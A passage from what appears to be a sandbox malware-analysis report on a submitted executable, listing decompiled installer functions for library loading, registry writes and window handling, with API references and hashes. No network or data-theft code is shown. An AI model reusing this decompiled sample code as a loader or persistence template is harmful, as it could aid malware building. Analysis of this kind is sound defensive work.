						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                  0x00401f67
                                                  0x00401f67
                                                  0x00401f6c
                                                  0x00401f73
                                                  0x0040202f
                                                  0x0040217a
                                                  0x0040217a
                                                  0x004028a1
                                                  0x004028a4
                                                  0x004028b0
                                                  0x004028b0
                                                  0x00401f82
                                                  0x00401f8c
                                                  0x00401f8f
                                                  0x00401f9e
                                                  0x00401fa8
                                                  0x00401fac
                                                  0x00402028
                                                  0x00000000
                                                  0x00402028
                                                  0x00401fae
                                                  0x00401fb8
                                                  0x00401fbc
                                                  0x00402000
                                                  0x00401fbe
                                                  0x00401fc1
                                                  0x00401fc4
                                                  0x00401ff4
                                                  0x00401fc6
                                                  0x00401fc9
                                                  0x00401fd2
                                                  0x00401fd4
                                                  0x00401fd4
                                                  0x00401fd2
                                                  0x00401fc4
                                                  0x00402008
                                                  0x0040201d
                                                  0x0040201d
                                                  0x00000000
                                                  0x00402008
                                                  0x00401f98
                                                  0x00401f9c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                  • Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
                                                  • Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                  • Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402319 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00402319(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B01(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A0C(2);
				_t18 = E00402A0C(0x11);
				_t31 =  *0x424030 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A0C(0x23);
						_t19 = lstrlenA(0x40a450) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EF(3);
						 *0x40a450 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x424008 =  *0x424008 +  *(_t37 - 4);
				return 0;
			}










                                                  0x0040231a
                                                  0x0040231f
                                                  0x00402329
                                                  0x00402333
                                                  0x00402336
                                                  0x00402346
                                                  0x00402350
                                                  0x00402357
                                                  0x0040235f
                                                  0x0040236d
                                                  0x00402371
                                                  0x0040237c
                                                  0x0040237c
                                                  0x00402380
                                                  0x00402384
                                                  0x0040238a
                                                  0x0040238f
                                                  0x0040238f
                                                  0x00402393
                                                  0x0040239f
                                                  0x0040239f
                                                  0x004023b8
                                                  0x004023ba
                                                  0x004023ba
                                                  0x004023bd
                                                  0x00402493
                                                  0x00402493
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
                                                  • lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                  • Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
                                                  • Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                  • Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
				 *0x40b064 = E004029EF(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b06b = 1;
				 *0x40b068 = _t11 & 0x00000001;
				 *0x40b069 = _t11 & 0x00000002;
				 *0x40b06a = _t11 & 0x00000004;
				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b054);
				_push(_t14);
				_push(_t26);
				E00405C59();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                  0x00401d29
                                                  0x00401d42
                                                  0x00401d4c
                                                  0x00401d51
                                                  0x00401d5c
                                                  0x00401d63
                                                  0x00401d75
                                                  0x00401d7b
                                                  0x00401d80
                                                  0x00401d8a
                                                  0x004024ce
                                                  0x00401561
                                                  0x00402849
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D22
                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                  • CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirect
                                                  • String ID:
                                                  • API String ID: 3272661963-0
                                                  • Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                  • Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
                                                  • Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                  • Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403A17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403A17(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C72(__ecx, "1033");
				while(1) {
					_t26 =  *0x423fc4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f90 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423fc0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423760 = _t18[1];
					 *0x424028 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42375c = _t23;
						E00405C59(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, 0x423780, 0xfffffffe));
						_t11 =  *0x423fac;
						_t27 =  *0x423fa8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D1D(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                  0x00403a1b
                                                  0x00403a20
                                                  0x00403a26
                                                  0x00403a2b
                                                  0x00403a2b
                                                  0x00403a33
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a3b
                                                  0x00403a43
                                                  0x00403a45
                                                  0x00403a4b
                                                  0x00403a4b
                                                  0x00403a4d
                                                  0x00403a59
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a5f
                                                  0x00403a64
                                                  0x00403a6d
                                                  0x00403a73
                                                  0x00403a78
                                                  0x00403a8c
                                                  0x00403a97
                                                  0x00403aaf
                                                  0x00403ab5
                                                  0x00403aba
                                                  0x00403ac2
                                                  0x00403ae3
                                                  0x00403ae3
                                                  0x00403ae3
                                                  0x00403ac4
                                                  0x00403ac6
                                                  0x00403ac6
                                                  0x00403aca
                                                  0x00403ad1
                                                  0x00403ad1
                                                  0x00403ad6
                                                  0x00403adc
                                                  0x00403adc
                                                  0x00000000
                                                  0x00403ac6
                                                  0x00403a7a
                                                  0x00403a7f
                                                  0x00403a88
                                                  0x00403a81
                                                  0x00403a81
                                                  0x00403a81
                                                  0x00403a7f

                                                  APIs
                                                  • SetWindowTextA.USER32(00000000,00423780), ref: 00403AAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$1033
                                                  • API String ID: 530164218-2318113328
                                                  • Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                  • Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
                                                  • Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                  • Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404F37 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420568 != _t22) {
							 *0x420568 = _t22;
							E00405CFB(0x420580, 0x425000);
							E00405C59(0x425000, _t22);
							E0040140B(6);
							E00405CFB(0x425000, 0x420580);
						}
						L11:
						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004048B6(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404003(0x413);
				return 0;
			}




                                                  0x00404f43
                                                  0x00404f68
                                                  0x00404f88
                                                  0x00404f8b
                                                  0x00404f8e
                                                  0x00404fa5
                                                  0x00404fab
                                                  0x00404fb2
                                                  0x00404fb9
                                                  0x00404fc0
                                                  0x00404fc5
                                                  0x00404fcb
                                                  0x00000000
                                                  0x00404fdb
                                                  0x00404f75
                                                  0x00404fc8
                                                  0x00404fc8
                                                  0x00000000
                                                  0x00404fc8
                                                  0x00404f81
                                                  0x00404f83
                                                  0x00000000
                                                  0x00404f83
                                                  0x00404f49
                                                  0x00000000
                                                  0x00000000
                                                  0x00404f50
                                                  0x00000000

                                                  APIs
                                                  • IsWindowVisible.USER32 ref: 00404F6D
                                                  • CallWindowProcA.USER32 ref: 00404FDB
                                                    • Part of subcall function 00404003: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404015
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                  • Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
                                                  • Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                  • Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004036B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004036B9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f53c;
				_t3 = E0040369E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f53c =  *0x41f53c & 0x00000000;
				return _t3;
			}







                                                  0x004036ba
                                                  0x004036c2
                                                  0x004036c9
                                                  0x004036cc
                                                  0x004036cc
                                                  0x004036ce
                                                  0x004036d3
                                                  0x004036da
                                                  0x004036e0
                                                  0x004036e4
                                                  0x004036e5
                                                  0x004036ed

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7476F560,00403690,00000000,00403482,00000000), ref: 004036D3
                                                  • GlobalFree.KERNEL32 ref: 004036DA
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3081826266
                                                  • Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                  • Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
                                                  • Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                  • Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405835 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405835(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                  0x00405836
                                                  0x00405840
                                                  0x00405842
                                                  0x00405849
                                                  0x00405851
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405851
                                                  0x00405853
                                                  0x00405858

                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Lc8xQv8iZY.exe,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 0040583B
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Lc8xQv8iZY.exe,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 00405849
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                  • Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
                                                  • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                  • Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405947 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405947(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                  0x00405953
                                                  0x00405955
                                                  0x0040597d
                                                  0x00405962
                                                  0x00405967
                                                  0x00405972
                                                  0x00000000
                                                  0x0040598f
                                                  0x0040597b
                                                  0x0040597b
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                  • Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
                                                  • Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                  • Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:5.4%
                                                  Dynamic/Decrypted Code Coverage:7.1%
                                                  Signature Coverage:2.8%
                                                  Total number of Nodes:1172
                                                  Total number of Limit Nodes:15
